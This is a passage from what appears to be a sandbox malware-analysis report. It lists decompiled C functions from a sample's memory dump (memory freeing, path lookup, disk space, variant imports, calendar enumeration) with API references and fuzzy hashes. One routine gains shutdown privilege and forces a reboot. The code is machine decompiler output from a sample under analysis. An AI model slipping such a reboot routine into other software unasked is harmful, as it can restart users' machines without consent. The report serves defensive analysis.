                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                                                                            • Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
                                                                                                                            • Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                                                                            • Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403CF6 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 96%
                                                                                                                            			E00403CF6(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E00403C48();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x4bdb78 = 0;
				return _t30;
			}
















                                                                                                                            0x00403cfa
                                                                                                                            0x00403cfc
                                                                                                                            0x00403d01
                                                                                                                            0x00403d04
                                                                                                                            0x00403d09
                                                                                                                            0x00403d0d
                                                                                                                            0x00403d13
                                                                                                                            0x00403d17
                                                                                                                            0x00403d1d
                                                                                                                            0x00403d39
                                                                                                                            0x00403d3d
                                                                                                                            0x00403d40
                                                                                                                            0x00403d42
                                                                                                                            0x00403d4a
                                                                                                                            0x00403d5e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403d65
                                                                                                                            0x00403d6b
                                                                                                                            0x00403d6d
                                                                                                                            0x00403d6f
                                                                                                                            0x00000000
                                                                                                                            0x00403d6f
                                                                                                                            0x00000000
                                                                                                                            0x00403d6b
                                                                                                                            0x00403d60
                                                                                                                            0x00403d1f
                                                                                                                            0x00403d27
                                                                                                                            0x00403d2e
                                                                                                                            0x00403d34
                                                                                                                            0x00403d30
                                                                                                                            0x00403d30
                                                                                                                            0x00403d30
                                                                                                                            0x00403d2e
                                                                                                                            0x00403d73
                                                                                                                            0x00403d75
                                                                                                                            0x00403d7e
                                                                                                                            0x00403d87
                                                                                                                            0x00403d87
                                                                                                                            0x00403d8a
                                                                                                                            0x00403d9a

                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$Free$Query
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 778034434-0
                                                                                                                            • Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                                                                            • Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
                                                                                                                            • Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                                                                            • Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 0040A928 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E0040A928(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040A904(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040A904(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040A34C( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040A904(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040A34C(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040A34C(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040A34C(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}






















                                                                                                                            0x0040a934
                                                                                                                            0x0040a937
                                                                                                                            0x0040a93d
                                                                                                                            0x0040a94a
                                                                                                                            0x0040a94e
                                                                                                                            0x0040a98d
                                                                                                                            0x0040a994
                                                                                                                            0x0040a9d4
                                                                                                                            0x00000000
                                                                                                                            0x0040a996
                                                                                                                            0x0040a99e
                                                                                                                            0x0040a9af
                                                                                                                            0x0040a9b5
                                                                                                                            0x0040a9bb
                                                                                                                            0x0040a9c3
                                                                                                                            0x0040a9c9
                                                                                                                            0x0040a9d7
                                                                                                                            0x0040a9d9
                                                                                                                            0x0040a9dc
                                                                                                                            0x0040a9de
                                                                                                                            0x0040a9e0
                                                                                                                            0x0040a9e0
                                                                                                                            0x0040a9e3
                                                                                                                            0x0040a9eb
                                                                                                                            0x0040a9fc
                                                                                                                            0x0040aac3
                                                                                                                            0x0040aa0e
                                                                                                                            0x0040aa12
                                                                                                                            0x0040aa14
                                                                                                                            0x0040aa16
                                                                                                                            0x0040aa18
                                                                                                                            0x0040aa18
                                                                                                                            0x0040aa23
                                                                                                                            0x0040aa33
                                                                                                                            0x0040aa37
                                                                                                                            0x0040aa39
                                                                                                                            0x0040aa3b
                                                                                                                            0x0040aa3d
                                                                                                                            0x0040aa3d
                                                                                                                            0x0040aa43
                                                                                                                            0x0040aa5b
                                                                                                                            0x0040aa62
                                                                                                                            0x0040aa68
                                                                                                                            0x0040aa84
                                                                                                                            0x0040aa86
                                                                                                                            0x0040aaad
                                                                                                                            0x0040aabf
                                                                                                                            0x0040aac1
                                                                                                                            0x00000000
                                                                                                                            0x0040aac1
                                                                                                                            0x0040aa84
                                                                                                                            0x0040aa62
                                                                                                                            0x00000000
                                                                                                                            0x0040aa23
                                                                                                                            0x0040aad9
                                                                                                                            0x0040aad9
                                                                                                                            0x0040a9eb
                                                                                                                            0x0040a9c9
                                                                                                                            0x0040a9b5
                                                                                                                            0x0040a99e
                                                                                                                            0x0040a950
                                                                                                                            0x0040a95b
                                                                                                                            0x0040a95f
                                                                                                                            0x00000000
                                                                                                                            0x0040a961
                                                                                                                            0x0040a961
                                                                                                                            0x0040a96c
                                                                                                                            0x0040a970
                                                                                                                            0x0040a975
                                                                                                                            0x00000000
                                                                                                                            0x0040a977
                                                                                                                            0x0040a983
                                                                                                                            0x0040a983
                                                                                                                            0x0040a975
                                                                                                                            0x0040a95f
                                                                                                                            0x0040aade
                                                                                                                            0x0040aae7

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
                                                                                                                            • FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                                                            • API String ID: 1930782624-3908791685
                                                                                                                            • Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                                                                            • Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
                                                                                                                            • Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                                                                                            • Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004AF110 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E004AF110() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E0041FF2C() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}







                                                                                                                            0x004af11b
                                                                                                                            0x004af178
                                                                                                                            0x004af17c
                                                                                                                            0x004af184
                                                                                                                            0x00000000
                                                                                                                            0x004af186
                                                                                                                            0x004af12d
                                                                                                                            0x004af13f
                                                                                                                            0x004af144
                                                                                                                            0x004af14c
                                                                                                                            0x004af166
                                                                                                                            0x004af172
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004af174
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
                                                                                                                            • ExitWindowsEx.USER32 ref: 004AF17C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                            • API String ID: 107509674-3733053543
                                                                                                                            • Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                                                                            • Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
                                                                                                                            • Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                                                                            • Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041A4DC Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0041A4DC(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				WCHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E004095A8(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E004095A8(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

















                                                                                                                            0x0041a4e3
                                                                                                                            0x0041a4e8
                                                                                                                            0x0041a4ea
                                                                                                                            0x0041a4ea
                                                                                                                            0x0041a4fd
                                                                                                                            0x0041a50c
                                                                                                                            0x0041a50f
                                                                                                                            0x0041a51c
                                                                                                                            0x0041a51f
                                                                                                                            0x0041a524
                                                                                                                            0x0041a527
                                                                                                                            0x0041a529
                                                                                                                            0x0041a536
                                                                                                                            0x0041a539
                                                                                                                            0x0041a53e
                                                                                                                            0x0041a541
                                                                                                                            0x0041a543
                                                                                                                            0x0041a54c

                                                                                                                            APIs
                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0041A4FD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1705453755-0
                                                                                                                            • Opcode ID: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                                                                            • Instruction ID: 14c90aad059d6341cd8fbca9d1c94cd423dd62e4f1f0ed92fc39ecac232c4210
                                                                                                                            • Opcode Fuzzy Hash: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                                                                            • Instruction Fuzzy Hash: 7711C0B5A01209AFDB04CF9ACD819EFB7F9EFC8304B14C569A505E7255E6319E018B94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00427874 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00427874() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleW(L"oleaut32.dll");
				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
				 *0x4c1188 = _t46;
				return _t46;
			}






                                                                                                                            0x00427882
                                                                                                                            0x00427896
                                                                                                                            0x004278ac
                                                                                                                            0x004278c2
                                                                                                                            0x004278d8
                                                                                                                            0x004278ee
                                                                                                                            0x00427904
                                                                                                                            0x0042791a
                                                                                                                            0x00427930
                                                                                                                            0x00427946
                                                                                                                            0x0042795c
                                                                                                                            0x00427972
                                                                                                                            0x00427988
                                                                                                                            0x0042799e
                                                                                                                            0x004279b4
                                                                                                                            0x004279ca
                                                                                                                            0x004279e0
                                                                                                                            0x004279f6
                                                                                                                            0x00427a0c
                                                                                                                            0x00427a22
                                                                                                                            0x00427a38
                                                                                                                            0x00427a4e
                                                                                                                            0x00427a5e
                                                                                                                            0x00427a64
                                                                                                                            0x00427a6b

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D
                                                                                                                              • Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                                            • Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                                                                            • Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
                                                                                                                            • Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                                                                            • Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041E7CC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 194threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _t32;
				signed int _t53;
				signed int _t56;
				signed int _t71;
				signed int _t78;
				signed int* _t82;
				signed int _t85;
				void* _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				signed int _t109;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t131;
				void* _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				long long _t161;

				_t161 = __fp0;
				_t126 = __edi;
				_t109 = __edx;
				_t139 = _t140;
				_t141 = _t140 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t93 = __eax;
				_push(_t139);
				_push(0x41ea61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				_t32 =  *0x4ba590; // 0x4bb8f8
				_t144 =  *_t32;
				if( *_t32 == 0) {
					E0040554C(0x1a);
				}
				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
				_push(_t139);
				_push(0x41ea44);
				_push( *[fs:edx]);
				 *[fs:edx] = _t141;
				 *0x4be7dc = 0;
				_push(0);
				E00409C00();
				_t142 = _t141 + 4;
				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
				if(_t127 + 0xfffffffd - 3 >= 0) {
					__eflags = _t127 - 0xffffffffffffffff;
					if(_t127 - 0xffffffffffffffff < 0) {
						 *0x4be7dc = 1;
						_push(1);
						E00409C00();
						_t142 = _t142 + 4;
						E00407E00( *0x4be7e0, L"B.C.");
						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
						_t71 =  *0x4be7e0;
						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
						E0041C1C4(1, 1, 1, __eflags, _t161);
						_v20 = E00405790();
						_v16 = 1;
						asm("fild qword [ebp-0x10]");
						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
						asm("wait");
						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
						_t78 =  *0x4be7e0;
						__eflags = _t78;
						if(_t78 != 0) {
							_t82 = _t78 - 4;
							__eflags = _t82;
							_t78 =  *_t82;
						}
						_t134 = _t78 - 1;
						__eflags = _t134;
						if(_t134 > 0) {
							_t98 = 1;
							do {
								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
								_t98 = _t98 + 1;
								_t134 = _t134 - 1;
								__eflags = _t134;
							} while (_t134 != 0);
						}
						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
					}
				} else {
					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
					_t85 =  *0x4be7e0;
					if(_t85 != 0) {
						_t85 =  *(_t85 - 4);
					}
					_t136 = _t85 - 1;
					if(_t136 >= 0) {
						_t137 = _t136 + 1;
						_t99 = 0;
						do {
							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
							_t99 = _t99 + 1;
							_t137 = _t137 - 1;
						} while (_t137 != 0);
					}
					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
				}
				_t94 =  *0x4be7e0;
				if(_t94 != 0) {
					_t94 =  *(_t94 - 4);
				}
				_push(_t94);
				E00409C00();
				_t53 =  *0x4be7e0;
				if(_t53 != 0) {
					_t53 =  *(_t53 - 4);
				}
				_t131 = _t53 - 1;
				if(_t131 >= 0) {
					_t132 = _t131 + 1;
					_t95 = 0;
					do {
						_t127 = _t95 + _t95 * 2;
						_t106 =  *0x416e18; // 0x416e1c
